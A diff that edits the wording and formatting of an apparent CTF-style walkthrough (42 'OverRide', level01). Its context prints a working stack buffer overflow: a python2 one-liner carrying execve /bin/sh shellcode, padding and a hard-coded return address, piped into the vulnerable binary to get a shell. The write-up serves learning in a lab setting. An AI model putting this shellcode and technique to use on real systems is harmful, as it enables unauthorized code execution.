eprei/42_override/level01/Ressources/walkthrough.md

 +++ killed by SIGSEGV +++
 ```

-We modify our exploit to use the address `0xffffd68c` instead of `0x42424242`, which in little endian format is
+We modify our exploit to use the address `0xffffd68c` instead of `0x42424242`, which in little-endian format is
 `\x8c\xd6\xff\xff`.

 ```shell
 level01@OverRide ~ $ python2 -c 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" + "A" * (80 - 21) + "\x8c\xd6\xff\xff"' > /tmp/exploit1
 ```

-# Exploiting the Program
+## Exploiting the Program

 Since the shellcode will spawn a shell, we need to provide an open standard input for the program to read from.
-That's
+That’s
 why we use `cat -` as the last command in the pipeline.
-This left the standard input open for the new shell to read from.
+This keeps the standard input open for the new shell to read
+from.

 ```shell
 level01@OverRide ~ $ (echo "dat_wil" ; cat /tmp/exploit1; cat -) | ./level01